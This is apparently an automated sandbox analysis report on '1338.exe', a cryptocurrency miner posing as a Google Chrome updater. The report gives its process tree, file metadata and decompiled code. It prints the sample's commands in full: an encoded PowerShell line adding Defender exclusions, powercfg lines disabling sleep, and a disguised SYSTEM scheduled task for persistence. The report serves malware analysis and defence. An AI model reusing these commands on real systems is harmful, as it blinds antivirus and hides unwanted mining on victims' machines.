                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1292
                                        Entropy (8bit):5.328578206529804
                                        Encrypted:false
                                        SSDEEP:24:3vRPpQrLAo4KAxX5qRPD42HOoVZe9t4CvKuKnKJRSF8PQ9eF:pPerB4nqRL/Hvfe9t4Cv94aR48Y9eF
                                        MD5:8AF75C45817AC79514D6CC38A486B805
                                        SHA1:CED8C609967BA48826C01D45CECE111BB9797BCE
                                        SHA-256:9B93C0BEB81A37BD904ECDB52F7F83284E2BD49F7CBC3D387774F47CFD37CD74
                                        SHA-512:29587826FFB78B7D38B4D66B638A885AA100578FE487F660E718568A848FCBF238AC0642AEC0ADF4299FC2BCF1D152A84D789BD211A21FF2EF4632BD10332DD5
                                        Malicious:false
                                        Preview:@...e...........................................................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                        Entropy (8bit):7.999416157743483
                                        TrID:
                                        • Win64 Executable (generic) (12005/4) 74.80%
                                        • Generic Win/DOS Executable (2004/3) 12.49%
                                        • DOS Executable Generic (2002/1) 12.47%
                                        • VXD Driver (31/22) 0.19%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                        File name:1338.exe
                                        File size:1951744
                                        MD5:ac711e6653707f0b1d245ff40d95385f
                                        SHA1:279b9abaf000303983d6ecfb91e8b221b00fb198
                                        SHA256:909409814d725477622728168035c3f2d259b5d8aa1ca77403d8c259bd7aba63
                                        SHA512:d394116574e829bc30eebebc71adadb2894d00e7dc31f35eae0a67675c5fc093be660382f242a80dfacf5415175b1ffd5817bd408c82f5800e52ea5e4196326e
                                        SSDEEP:49152:bSq99dc5dgyd2j/audFlu5EWEKzCOg/t/XBbntjrXfNpTM:b59STNYjFF8EKLgVRbtjrXH
                                        TLSH:179533146EA9DF6DF84754787915621DACE9E8334B2890AF241466B10BF5CB303FE3E8
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........................@.....................................\......................................
                                        Icon Hash:00828e8e8686b000
                                        Entrypoint:0x401bea
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:
                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:7dbd2319b33ed25eb7ad7d0162c2bb3a
                                        Instruction
                                        push ebp
                                        dec eax
                                        mov ebp, esp
                                        dec eax
                                        sub esp, 00000040h
                                        dec eax
                                        mov eax, 00000004h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        dec ecx
                                        mov eax, eax
                                        mov eax, 00000000h
                                        dec ecx
                                        mov ebx, eax
                                        dec eax
                                        lea eax, dword ptr [ebp-04h]
                                        dec ecx
                                        mov edx, eax
                                        dec esp
                                        mov ecx, edx
                                        dec esp
                                        mov edx, ebx
                                        call 00007F2804F90C01h
                                        dec eax
                                        lea eax, dword ptr [FFFFFF98h]
                                        dec ecx
                                        mov edx, eax
                                        dec esp
                                        mov ecx, edx
                                        call 00007F2804F90C1Fh
                                        mov eax, 00000001h
                                        dec ecx
                                        mov edx, eax
                                        dec esp
                                        mov ecx, edx
                                        call 00007F2804F90C17h
                                        mov eax, 00030000h
                                        dec ecx
                                        mov ebx, eax
                                        mov eax, 00010000h
                                        dec ecx
                                        mov edx, eax
                                        dec esp
                                        mov ecx, edx
                                        dec esp
                                        mov edx, ebx
                                        call 00007F2804F90C04h
                                        dec eax
                                        mov eax, dword ptr [001DAD1Ch]
                                        dec eax
                                        mov ecx, dword ptr [001DAD1Dh]
                                        dec eax
                                        mov edx, dword ptr [001DAD1Eh]
                                        dec eax
                                        mov dword ptr [ebp-10h], eax
                                        dec eax
                                        lea eax, dword ptr [ebp-04h]
                                        dec eax
                                        mov dword ptr [esp+20h], eax
                                        mov eax, dword ptr [001DC327h]
                                        dec ecx
                                        mov ecx, eax
                                        dec ecx
                                        mov eax, edx
                                        dec ecx
                                        mov ebx, ecx
                                        dec eax
                                        mov eax, dword ptr [ebp-10h]
                                        dec ecx
                                        mov edx, eax
                                        dec esp
                                        mov ecx, edx
                                        dec esp
                                        mov edx, ebx
                                        call 00007F2804F90BC9h
                                        dec eax
                                        mov eax, dword ptr [001DACD9h]
                                        dec eax
                                        mov ecx, dword ptr [001DACDAh]
                                        dec eax
                                        mov edx, dword ptr [001DACDBh]
                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0x1dc920         0x3c          .rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1df000         0x630         .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x1de000         0x90          .pdata
                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_IAT             0x1dc95c         0x90          .rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                        Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                        .text   0x1000           0xdd0         0xe00     False     0.436941964286   data       5.41840784885  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata  0x2000           0x1dab6c      0x1dac00  False     0.999571628982   data       7.99988164686  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .bss    0x1dd000         0xfac         0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .pdata  0x1de000         0x90          0x200     False     0.171875         data       1.18650676     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .rsrc   0x1df000         0x630         0x800     False     0.34228515625    data       3.77340234116  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        Name         RVA       Size   Type                          Language  Country
                                        RT_VERSION   0x1df0a0  0x2f0  SysEx File - ID               English   United States
                                        RT_MANIFEST  0x1df390  0x29f  XML 1.0 document, ASCII text  English   United States
                                        DLL           Import
                                        msvcrt.dll    malloc, memset, _get_pgmptr, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                        kernel32.dll  Sleep, GetWindowsDirectoryA, CreateProcessA, SetUnhandledExceptionFilter
                                        Description      Data
                                        LegalCopyright   Copyright 2017 Google Inc. All rights reserved.
                                        FileVersion      70,0,3538,110
                                        CompanyName      Google Inc.
                                        ProductName      Google Chrome
                                        ProductVersion   70,0,3538,110
                                        FileDescription  Google Chrome
                                        FileTitle        updater.exe
                                        LegalTrademark
                                        Translation      0x0409 0x04b0
                                        Language of compilation system  Country where language is spoken
                                        English                         United States
                                        No network behavior found

                                        Target ID:0
                                        Start time:22:19:13
                                        Start date:24/05/2022
                                        Path:C:\Users\user\Desktop\1338.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\1338.exe"
                                        Imagebase:0x400000
                                        File size:1951744 bytes
                                        MD5 hash:AC711E6653707F0B1D245FF40D95385F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Target ID:1
                                        Start time:22:19:14
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\1338.exe
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        Target ID:2
                                        Start time:22:19:16
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:3
                                        Start time:22:19:16
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:4
                                        Start time:22:19:17
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
                                        Imagebase:0x7ff619710000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        Target ID:9
                                        Start time:22:19:39
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:10
                                        Start time:22:19:40
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:11
                                        Start time:22:19:41
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -hibernate-timeout-ac 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Target ID:12
                                        Start time:22:19:41
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -hibernate-timeout-dc 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Target ID:13
                                        Start time:22:19:42
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"'
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:14
                                        Start time:22:19:42
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -standby-timeout-ac 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:15
                                        Start time:22:19:42
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:16
                                        Start time:22:19:43
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -standby-timeout-dc 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:17
                                        Start time:22:19:43
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Google\Chrome\updater.exe"'
                                        Imagebase:0x7ff79c0d0000
                                        File size:226816 bytes
                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:19
                                        Start time:22:19:53
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:21
                                        Start time:22:19:53
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:22
                                        Start time:22:19:54
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                        Imagebase:0x7ff79c0d0000
                                        File size:226816 bytes
                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:23
                                        Start time:22:19:54
                                        Start date:24/05/2022
                                        Path:C:\Program Files\Google\Chrome\updater.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Program Files\Google\Chrome\updater.exe
                                        Imagebase:0x400000
                                        File size:1951744 bytes
                                        MD5 hash:AC711E6653707F0B1D245FF40D95385F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 68%, Virustotal, Browse
                                        • Detection: 33%, Metadefender, Browse
                                        • Detection: 73%, ReversingLabs

                                        Target ID:24
                                        Start time:22:19:56
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                        Target ID:25
                                        Start time:22:19:58
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:26
                                        Start time:22:19:59
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:27
                                        Start time:22:20:00
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
                                        Imagebase:0x7ff619710000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET

                                        Target ID:32
                                        Start time:22:20:43
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:33
                                        Start time:22:20:43
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:34
                                        Start time:22:20:44
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -hibernate-timeout-ac 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:36
                                        Start time:22:20:45
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -hibernate-timeout-dc 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:37
                                        Start time:22:20:49
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\conhost.exe
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:38
                                        Start time:22:20:49
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -standby-timeout-ac 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:39
                                        Start time:22:20:50
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:powercfg /x -standby-timeout-dc 0
                                        Imagebase:0x7ff695530000
                                        File size:94720 bytes
                                        MD5 hash:7C749DC22FCB1ED42A87AFA986B720F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:41
                                        Start time:22:20:52
                                        Start date:24/05/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\conhost.exe" "ossgiopsxz
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET

                                          Execution Graph

                                          Execution Coverage:35.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:15
                                          Total number of Limit Nodes:0
                                          execution_graph 220 401ce2 _controlfp 221 4010c4 2 API calls 220->221 222 401d63 221->222 206 401bea 207 401c1c 206->207 210 401b3f 207->210 209 401cd5 211 401b75 210->211 214 4010c4 211->214 213 401bae 213->209 215 401d70 214->215 216 4010e7 memset 215->216 217 40114a 216->217 218 4011f1 sprintf 217->218 219 40129a 218->219 219->213

                                          Callgraph

                                          Control-flow Graph

                                          C-Code - Quality: 31%
                                          			E004010C4(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                          				void* _v32;
                                          				char _v136;
                                          				void* _v144;
                                          				char _v152;
                                          				char _v160;
                                          				char _v680;
                                          				void* _v1200;
                                          				void* _v1208;
                                          				char _v1468;
                                          				long long _v1480;
                                          				long long _v1496;
                                          				long long _v1504;
                                          				long long _v1512;
                                          				long long _v1520;
                                          				long long _v1528;
                                          				long long _v1536;
                                          				long long _v1544;
                                          				long long _t97;
                                          				long long _t107;
                                          
                                          				_a8 = __rcx;
                                          				_a16 = __rdx;
                                          				L00401D70(); // executed
                                          				memset(??, ??, ??);
                                          				_v136 = 0x68;
                                          				_v144 = 0;
                                          				_v152 = 0x1da8d4;
                                          				L00401D80();
                                          				L00401D88();
                                          				E00401000(0x402021,  &_v1468);
                                          				_v1480 = 0x402021;
                                          				E00401000(0x402027, 0x402021);
                                          				L00401D90();
                                          				E00401000(0x40203c,  &_v680);
                                          				sprintf(??, ??);
                                          				_v1504 =  &_v32;
                                          				_v1512 =  &_v136;
                                          				_v1520 = 0;
                                          				_v1528 = 0;
                                          				_v1536 = 0;
                                          				_v1544 = 0;
                                          				_t97 =  &_v680;
                                          				L00401D98(); // executed
                                          				_v1536 = _t97;
                                          				_v1544 = _t97;
                                          				E004019C6(_v32,  &_v144,  &_v152,  &_v152); // executed
                                          				E00401000(0x402046, _v32); // executed
                                          				_v1544 = 0;
                                          				E00401986(_v32, _v144, 0x402046, 0x1da8d4); // executed
                                          				_v1544 = 0;
                                          				_t107 = _v32;
                                          				E00401A06(_t107,  &_v144,  &_v152, 0); // executed
                                          				_v1496 = _t107;
                                          				_v1504 = 0;
                                          				_v1512 = 0;
                                          				_v1520 = 0;
                                          				_v1528 = 0;
                                          				_v1536 = 0;
                                          				_v1544 = _v144;
                                          				E00401946( &_v160, _v32, _v32, _v32); // executed
                                          				return 0;
                                          			}

                                          APIs
                                          Memory Dump Source
